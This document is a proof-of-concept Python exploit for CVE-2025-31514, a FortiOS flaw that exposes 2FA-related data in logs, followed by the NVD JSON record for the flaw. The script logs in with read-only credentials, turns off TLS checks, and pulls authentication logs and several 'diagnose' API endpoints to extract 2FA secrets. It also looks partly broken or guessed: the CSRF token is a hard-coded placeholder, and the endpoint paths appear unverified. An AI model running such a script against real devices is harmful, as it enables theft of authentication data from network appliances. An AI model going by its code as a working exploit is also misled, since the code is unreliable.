CVE-2025-31514

# CVE-2025-31514 PoC - FortiOS Sensitive Information Disclosure via Logs # This PoC demonstrates how an attacker with read-only privileges can # retrieve sensitive 2FA-related information from FortiOS logs and diagnose commands. import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET_HOST = "https://<fortios_target_ip>" READONLY_USER = "readonly_user" READONLY_PASS = "readonly_password" class FortiOSLogExploit: def __init__(self, host, username, password): self.host = host self.session = requests.Session() self.session.verify = False self.csrf_token = None self.username = username self.password = password def login(self): """Authenticate to FortiOS with read-only credentials""" # Step 1: Get CSRF token from login page login_page = self.session.get(f"{self.host}/login") # Extract CSRF token from the page (simplified) self.csrf_token = "extracted_csrf_token" # Step 2: Perform login with read-only credentials login_data = { "username": self.username, "secretkey": self.password, "csrfmiddlewaretoken": self.csrf_token } response = self.session.post( f"{self.host}/logincheck", data=login_data ) return response.status_code == 200 def retrieve_2fa_logs(self): """Retrieve sensitive 2FA information from system logs""" # Method 1: Access logs via web interface - filter for 2FA events log_filter = { "filter": "logid>=0100040000 AND logid<=0100049999", # FortiOS log IDs for authentication/2FA events } response = self.session.get( f"{self.host}/api/v2/log/event/log", params=log_filter ) return response.json() def execute_diagnose_command(self): """Execute diagnose command to extract 2FA sensitive data""" # Method 2: Use diagnose commands available with read-only privileges diagnose_endpoints = [ "/api/v2/monitor/system/diagnose/fortitoken", "/api/v2/monitor/system/diagnose/auth", "/api/v2/monitor/system/diagnose/two-factor", "/api/v2/monitor/user/fortitoken" ] sensitive_data = [] for endpoint in diagnose_endpoints: response = self.session.get(f"{self.host}{endpoint}") if response.status_code == 200: sensitive_data.append({ "endpoint": endpoint, "data": response.json() }) return sensitive_data def run_exploit(self): """Main exploit chain""" print("[*] CVE-2025-31514 - FortiOS 2FA Info Disclosure") print(f"[*] Target: {self.host}") # Step 1: Login with read-only credentials print("\n[+] Step 1: Authenticating with read-only credentials...") if self.login(): print("[+] Login successful!") else: print("[-] Login failed!") return # Step 2: Retrieve 2FA logs print("\n[+] Step 2: Retrieving 2FA-related logs...") logs = self.retrieve_2fa_logs() print(f"[+] Found {len(logs)} log entries containing 2FA info") # Step 3: Execute diagnose commands print("\n[+] Step 3: Executing diagnose commands...") diagnose_data = self.execute_diagnose_command() print(f"[+] Retrieved sensitive data from {len(diagnose_data)} endpoints") # Output extracted sensitive information print("\n[*] Extracted Sensitive 2FA Information:") for data in diagnose_data: print(f" Endpoint: {data['endpoint']}") print(f" Data: {data['data']}") if __name__ == "__main__": exploit = FortiOSLogExploit(TARGET_HOST, READONLY_USER, READONLY_PASS) exploit.run_exploit()

{"cve": {"id": "CVE-2025-31514", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:37.587", "lastModified": "2025-10-15T17:17:03.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Insertion of Sensitive Information into Log File vulnerability [CWE-532] in FortiOS 7.6.0 through 7.6.3, 7.4 all versions, 7.2 all versions, 7.0 all versions, 6.4 all versions may allow an attacker with at least read-only privileges to retrieve sensitive 2FA-related information via observing logs or via diagnose command."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "A70BE83D-8851-47DB-9360-B5B2E7CAE1ED"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "4DA70753-E996-4081-9C13-7F60AC993B09"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-452", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}